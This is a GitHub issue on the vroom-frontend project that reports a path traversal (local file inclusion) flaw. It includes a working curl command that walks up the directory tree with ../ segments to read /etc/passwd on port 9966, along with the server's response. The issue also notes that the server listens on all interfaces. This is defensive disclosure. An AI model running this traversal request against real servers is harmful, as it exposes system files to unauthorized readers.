vroom-frontend icon indicating copy to clipboard operation
vroom-frontend copied to clipboard
verified publisher icon VROOM-Project

Local File Inclusion

Open fitzg2 opened this issue 1 year ago • 0 comments

Be careful about exposing this to the internet

$ curl --path-as-is -i -s -k "http://public-ip:9966/../../../../../../../../../../../../../../../../etc/passwd"
HTTP/1.1 200 OK
content-type: application/octet-stream
Date: Wed, 31 Jul 2024 23:38:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Also it says it's running on 127.0.0.1 when in reality it listens on all ports for some reason.

fitzg2 avatar Aug 01 '24 14:08 fitzg2